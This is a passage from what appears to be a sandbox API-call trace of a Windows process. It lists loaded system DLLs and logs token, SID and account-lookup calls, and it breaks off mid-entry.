entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2011 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2012 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2013 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2014 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2015 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 2016 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2017 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2018 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2019 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 2020 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2021 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2022 start_va = 0x7fffcad60000 end_va = 0x7fffcad7cfff monitored = 0 entry_point = 0x7fffcad623b0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 2023 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2024 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2025 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2026 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2027 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2028 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2029 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2030 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2031 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2032 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2033 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2034 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2035 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2036 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2037 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2038 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2039 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2040 start_va = 0xde0000 end_va = 0xde2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2041 start_va = 0xdf0000 end_va = 0xdfafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2042 start_va = 0xde0000 end_va = 0xde2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2043 start_va = 0xdf0000 end_va = 0xdfafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4045 start_va = 0xdd0000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 4046 start_va = 0x7fffc68a0000 end_va = 0x7fffc68abfff monitored = 0 entry_point = 0x7fffc68a2850 region_type = mapped_file name = "win32_deviceguard.dll" filename = "\\Windows\\System32\\Win32_DeviceGuard.dll" (normalized: "c:\\windows\\system32\\win32_deviceguard.dll") Region: id = 4047 start_va = 0x7fffab7f0000 end_va = 0x7fffab829fff monitored = 0 entry_point = 0x7fffab80d3f0 region_type = mapped_file name = "wmitomi.dll" filename = "\\Windows\\System32\\wmitomi.dll" (normalized: "c:\\windows\\system32\\wmitomi.dll") Region: id = 4048 start_va = 0xfd0000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 4049 start_va = 0x7fffbdcd0000 end_va = 0x7fffbdcf2fff monitored = 0 entry_point = 0x7fffbdcd20b0 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 4050 start_va = 0x7fffbdc70000 end_va = 0x7fffbdccffff monitored = 0 entry_point = 0x7fffbdc729d0 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 4051 start_va = 0x7fffb4d40000 end_va = 0x7fffb4d50fff monitored = 0 entry_point = 0x7fffb4d42aa0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 4052 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4053 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 4054 start_va = 0x7fffc3530000 end_va = 0x7fffc3547fff monitored = 0 entry_point = 0x7fffc3535c50 region_type = mapped_file name = "win32_tpm.dll" filename = "\\Windows\\System32\\wbem\\Win32_Tpm.dll" (normalized: "c:\\windows\\system32\\wbem\\win32_tpm.dll") Region: id = 4055 start_va = 0x7fffae3b0000 end_va = 0x7fffae4ccfff monitored = 0 entry_point = 0x7fffae46aea0 region_type = mapped_file name = "tpmcoreprovisioning.dll" filename = "\\Windows\\System32\\TpmCoreProvisioning.dll" (normalized: "c:\\windows\\system32\\tpmcoreprovisioning.dll") Region: id = 4056 start_va = 0x7fffc9bf0000 end_va = 0x7fffc9c16fff monitored = 0 entry_point = 0x7fffc9bf6200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4057 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4058 start_va = 0x7fffc9bb0000 end_va = 0x7fffc9beafff monitored = 0 entry_point = 0x7fffc9bb4000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 4059 start_va = 0x7fffaec50000 end_va = 0x7fffaec6afff monitored = 0 entry_point = 0x7fffaec559c0 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 4060 start_va = 0x7fffcad60000 end_va = 0x7fffcad7cfff monitored = 0 entry_point = 0x7fffcad623b0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 4062 start_va = 0x1f0000 end_va = 0x1fcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4806 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4864 start_va = 0x7fffc3460000 end_va = 0x7fffc3471fff monitored = 0 entry_point = 0x7fffc34616b0 region_type = mapped_file name = "cbsapi.dll" filename = "\\Windows\\servicing\\CbsApi.dll" (normalized: "c:\\windows\\servicing\\cbsapi.dll") Region: id = 5140 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Thread: id = 189 os_tid = 0x15c0 Thread: id = 190 os_tid = 0xe18 Thread: id = 191 os_tid = 0xb08 [0203.070] WaitForSingleObjectEx (hHandle=0x410, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0203.556] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10cff30 | out: lpSystemTimeAsFileTime=0x10cff30*(dwLowDateTime=0x24d87ce, dwHighDateTime=0x1da9889)) [0203.556] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10cff38 | out: lpSystemTimeAsFileTime=0x10cff38*(dwLowDateTime=0x24d87ce, dwHighDateTime=0x1da9889)) [0203.556] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10cff40 | out: lpSystemTimeAsFileTime=0x10cff40*(dwLowDateTime=0x24d87ce, dwHighDateTime=0x1da9889)) [0203.556] WaitForSingleObjectEx (hHandle=0x410, dwMilliseconds=0x493e0, bAlertable=0) returned 0x102 [0214.167] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10cff30 | out: lpSystemTimeAsFileTime=0x10cff30*(dwLowDateTime=0x8a1955b, dwHighDateTime=0x1da9889)) [0214.168] free (_Block=0xec9760) [0214.168] FreeLibrary (hLibModule=0x7fffb57e0000) returned 1 [0214.168] free (_Block=0xefada0) [0214.169] free (_Block=0xea7ac0) [0214.169] WaitForSingleObjectEx (hHandle=0x410, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 192 os_tid = 0xdc0 [0203.026] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management", ulOptions=0x0, samDesired=0x20019, phkResult=0x5ed4c0 | out: phkResult=0x5ed4c0*=0xa8c) returned 0x0 [0203.026] RegQueryValueExW (in: hKey=0xa8c, lpValueName="PagingFiles", lpReserved=0x0, lpType=0x0, lpData=0x5ed6f0, lpcbData=0x5ed4a8*=0x2c | out: lpType=0x0, lpData=0x5ed6f0*=0x3f, lpcbData=0x5ed4a8*=0x22) returned 0x0 [0203.027] RegCloseKey (hKey=0xa8c) returned 0x0 [0203.027] GetCurrentThread () returned 0xfffffffffffffffe [0203.027] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x5ed358 | out: TokenHandle=0x5ed358*=0xa8c) returned 1 [0203.027] GetTokenInformation (in: TokenHandle=0xa8c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x5ed340 | out: TokenInformation=0x0, ReturnLength=0x5ed340) returned 0 [0203.027] GetLastError () returned 0x7a [0203.027] malloc (_Size=0x2c) returned 0xe72930 [0203.027] GetTokenInformation (in: TokenHandle=0xa8c, TokenInformationClass=0x1, TokenInformation=0xe72930, TokenInformationLength=0x2c, ReturnLength=0x5ed340 | out: TokenInformation=0xe72930, ReturnLength=0x5ed340) returned 1 [0203.027] IsValidSid (pSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.027] GetLengthSid (pSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 0x1c [0203.027] malloc (_Size=0x1c) returned 0xecd450 [0203.027] CopySid (in: nDestinationSidLength=0x1c, pDestinationSid=0xecd450, pSourceSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)) | out: pDestinationSid=0xecd450*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.027] GetSidIdentifierAuthority (pSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 0xe72942 [0203.027] malloc (_Size=0x18) returned 0xec9c00 [0203.027] _ultow (in: _Dest=0x5, _Radix=6213888 | out: _Dest=0x5) returned="5" [0203.027] malloc (_Size=0x18) returned 0xec9c20 [0203.027] malloc (_Size=0x18) returned 0xec96a0 [0203.027] SysStringLen (param_1="S-1-") returned 0x4 [0203.028] SysStringLen (param_1="5") returned 0x1 [0203.028] memcpy (in: _Dst=0x4c2d58, _Src=0x1758618, _Size=0xa | out: _Dst=0x4c2d58) returned 0x4c2d58 [0203.028] memcpy (in: _Dst=0x4c2d60, _Src=0x4c2d28, _Size=0x4 | out: _Dst=0x4c2d60) returned 0x4c2d60 [0203.028] free (_Block=0xec9c00) [0203.028] free (_Block=0xec9c20) [0203.028] GetSidSubAuthorityCount (pSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 0xe72941 [0203.028] GetSidSubAuthority (pSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x0) returned 0xe72948 [0203.028] _ultow (in: _Dest=0x15, _Radix=6213888 | out: _Dest=0x15) returned="21" [0203.028] malloc (_Size=0x18) returned 0xec95e0 [0203.028] malloc (_Size=0x18) returned 0xec9800 [0203.028] SysStringLen (param_1="S-1-5") returned 0x5 [0203.028] SysStringLen (param_1="-") returned 0x1 [0203.028] memcpy (in: _Dst=0x4c2d28, _Src=0x4c2d58, _Size=0xc | out: _Dst=0x4c2d28) returned 0x4c2d28 [0203.028] memcpy (in: _Dst=0x4c2d32, _Src=0x1758618, _Size=0x4 | out: _Dst=0x4c2d32) returned 0x4c2d32 [0203.028] free (_Block=0xec96a0) [0203.028] free (_Block=0xec95e0) [0203.028] malloc (_Size=0x18) returned 0xec9ac0 [0203.028] malloc (_Size=0x18) returned 0xec95e0 [0203.029] SysStringLen (param_1="S-1-5-") returned 0x6 [0203.029] SysStringLen (param_1="21") returned 0x2 [0203.029] memcpy (in: _Dst=0x1758618, _Src=0x4c2d28, _Size=0xe | out: _Dst=0x1758618) returned 0x1758618 [0203.029] memcpy (in: _Dst=0x1758624, _Src=0x4c2d58, _Size=0x6 | out: _Dst=0x1758624) returned 0x1758624 [0203.029] free (_Block=0xec9800) [0203.029] free (_Block=0xec9ac0) [0203.029] GetSidSubAuthority (pSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x1) returned 0xe7294c [0203.029] _ultow (in: _Dest=0xea06bcc, _Radix=6213888 | out: _Dest=0xea06bcc) returned="245394380" [0203.029] malloc (_Size=0x18) returned 0xec9a60 [0203.029] malloc (_Size=0x18) returned 0xec9780 [0203.029] SysStringLen (param_1="S-1-5-21") returned 0x8 [0203.029] SysStringLen (param_1="-") returned 0x1 [0203.029] memcpy (in: _Dst=0x4c2d58, _Src=0x1758618, _Size=0x12 | out: _Dst=0x4c2d58) returned 0x4c2d58 [0203.029] memcpy (in: _Dst=0x4c2d68, _Src=0x4c2d28, _Size=0x4 | out: _Dst=0x4c2d68) returned 0x4c2d68 [0203.029] free (_Block=0xec95e0) [0203.029] free (_Block=0xec9a60) [0203.029] malloc (_Size=0x18) returned 0xec9c00 [0203.029] malloc (_Size=0x18) returned 0xec95e0 [0203.029] SysStringLen (param_1="S-1-5-21-") returned 0x9 [0203.030] SysStringLen (param_1="245394380") returned 0x9 [0203.030] memcpy (in: _Dst=0x14d0d18, _Src=0x4c2d58, _Size=0x14 | out: _Dst=0x14d0d18) returned 0x14d0d18 [0203.030] memcpy (in: _Dst=0x14d0d2a, _Src=0x1758618, _Size=0x14 | out: _Dst=0x14d0d2a) returned 0x14d0d2a [0203.030] free (_Block=0xec9780) [0203.030] free (_Block=0xec9c00) [0203.030] GetSidSubAuthority (pSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x2) returned 0xe72950 [0203.030] _ultow (in: _Dest=0x87b29251, _Radix=6213888 | out: _Dest=0x87b29251) returned="2276627025" [0203.030] malloc (_Size=0x18) returned 0xec9c00 [0203.030] malloc (_Size=0x18) returned 0xec9b20 [0203.030] SysStringLen (param_1="S-1-5-21-245394380") returned 0x12 [0203.030] SysStringLen (param_1="-") returned 0x1 [0203.030] memcpy (in: _Dst=0x14d0d68, _Src=0x14d0d18, _Size=0x26 | out: _Dst=0x14d0d68) returned 0x14d0d68 [0203.030] memcpy (in: _Dst=0x14d0d8c, _Src=0x4c2d58, _Size=0x4 | out: _Dst=0x14d0d8c) returned 0x14d0d8c [0203.030] free (_Block=0xec95e0) [0203.030] free (_Block=0xec9c00) [0203.030] malloc (_Size=0x18) returned 0xec9880 [0203.030] malloc (_Size=0x18) returned 0xec9940 [0203.031] SysStringLen (param_1="S-1-5-21-245394380-") returned 0x13 [0203.031] SysStringLen (param_1="2276627025") returned 0xa [0203.031] memcpy (in: _Dst=0x4d2fe8, _Src=0x14d0d68, _Size=0x28 | out: _Dst=0x4d2fe8) returned 0x4d2fe8 [0203.031] memcpy (in: _Dst=0x4d300e, _Src=0x4c2d58, _Size=0x16 | out: _Dst=0x4d300e) returned 0x4d300e [0203.031] free (_Block=0xec9b20) [0203.031] free (_Block=0xec9880) [0203.031] GetSidSubAuthority (pSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x3) returned 0xe72954 [0203.031] _ultow (in: _Dest=0xefe1bce5, _Radix=6213888 | out: _Dest=0xefe1bce5) returned="4024548581" [0203.031] malloc (_Size=0x18) returned 0xec9ca0 [0203.031] malloc (_Size=0x18) returned 0xec9960 [0203.031] SysStringLen (param_1="S-1-5-21-245394380-2276627025") returned 0x1d [0203.031] SysStringLen (param_1="-") returned 0x1 [0203.032] memcpy (in: _Dst=0x509f28, _Src=0x4d2fe8, _Size=0x3c | out: _Dst=0x509f28) returned 0x509f28 [0203.032] memcpy (in: _Dst=0x509f62, _Src=0x4c2d58, _Size=0x4 | out: _Dst=0x509f62) returned 0x509f62 [0203.032] free (_Block=0xec9940) [0203.032] free (_Block=0xec9ca0) [0203.032] malloc (_Size=0x18) returned 0xec9ac0 [0203.032] malloc (_Size=0x18) returned 0xec9ca0 [0203.032] SysStringLen (param_1="S-1-5-21-245394380-2276627025-") returned 0x1e [0203.032] SysStringLen (param_1="4024548581") returned 0xa [0203.032] memcpy (in: _Dst=0x4d2fe8, _Src=0x509f28, _Size=0x3e | out: _Dst=0x4d2fe8) returned 0x4d2fe8 [0203.032] memcpy (in: _Dst=0x4d3024, _Src=0x4c2d58, _Size=0x16 | out: _Dst=0x4d3024) returned 0x4d3024 [0203.032] free (_Block=0xec9960) [0203.032] free (_Block=0xec9ac0) [0203.032] GetSidSubAuthority (pSid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x4) returned 0xe72958 [0203.032] _ultow (in: _Dest=0x3e8, _Radix=6213888 | out: _Dest=0x3e8) returned="1000" [0203.032] malloc (_Size=0x18) returned 0xec9b20 [0203.032] malloc (_Size=0x18) returned 0xec9ae0 [0203.032] SysStringLen (param_1="S-1-5-21-245394380-2276627025-4024548581") returned 0x28 [0203.032] SysStringLen (param_1="-") returned 0x1 [0203.033] memcpy (in: _Dst=0x509f28, _Src=0x4d2fe8, _Size=0x52 | out: _Dst=0x509f28) returned 0x509f28 [0203.033] memcpy (in: _Dst=0x509f78, _Src=0x4c2d58, _Size=0x4 | out: _Dst=0x509f78) returned 0x509f78 [0203.033] free (_Block=0xec9ca0) [0203.033] free (_Block=0xec9b20) [0203.033] malloc (_Size=0x18) returned 0xec9ca0 [0203.033] malloc (_Size=0x18) returned 0xec9ac0 [0203.033] SysStringLen (param_1="S-1-5-21-245394380-2276627025-4024548581-") returned 0x29 [0203.033] SysStringLen (param_1="1000") returned 0x4 [0203.033] memcpy (in: _Dst=0x4d2fe8, _Src=0x509f28, _Size=0x54 | out: _Dst=0x4d2fe8) returned 0x4d2fe8 [0203.033] memcpy (in: _Dst=0x4d303a, _Src=0x4c2d58, _Size=0xa | out: _Dst=0x4d303a) returned 0x4d303a [0203.033] free (_Block=0xec9ae0) [0203.033] free (_Block=0xec9ca0) [0203.033] SysStringLen (param_1="S-1-5-21-245394380-2276627025-4024548581-1000") returned 0x2d [0203.033] malloc (_Size=0x5c) returned 0xe9a940 [0203.033] free (_Block=0xec9ac0) [0203.033] malloc (_Size=0x18) returned 0xec9d00 [0203.034] free (_Block=0xe9a940) [0203.035] LookupAccountSidW (in: lpSystemName=0x0, Sid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), Name=0x0, cchName=0x5ed1d0, ReferencedDomainName=0x0, cchReferencedDomainName=0x5ed238, peUse=0x5ed2f0 | out: Name=0x0, cchName=0x5ed1d0, ReferencedDomainName=0x0, cchReferencedDomainName=0x5ed238, peUse=0x5ed2f0) returned 0 [0203.036] GetLastError () returned 0x7a [0203.036] malloc (_Size=0x14) returned 0xec97a0 [0203.036] malloc (_Size=0x16) returned 0xec9960 [0203.036] LookupAccountSidW (in: lpSystemName=0x0, Sid=0xe72940*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), Name=0xec97a0, cchName=0x5ed1d0, ReferencedDomainName=0xec9960, cchReferencedDomainName=0x5ed238, peUse=0x5ed2f0 | out: Name="OqXZRaykm", cchName=0x5ed1d0, ReferencedDomainName="PXTHFFRYO7", cchReferencedDomainName=0x5ed238, peUse=0x5ed2f0) returned 1 [0203.037] malloc (_Size=0x18) returned 0xec9c00 [0203.037] malloc (_Size=0x18) returned 0xec9ca0 [0203.037] free (_Block=0xec97a0) [0203.037] free (_Block=0xec9960) [0203.037] free (_Block=0x0) [0203.037] IsValidSid (pSid=0xecd450*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, 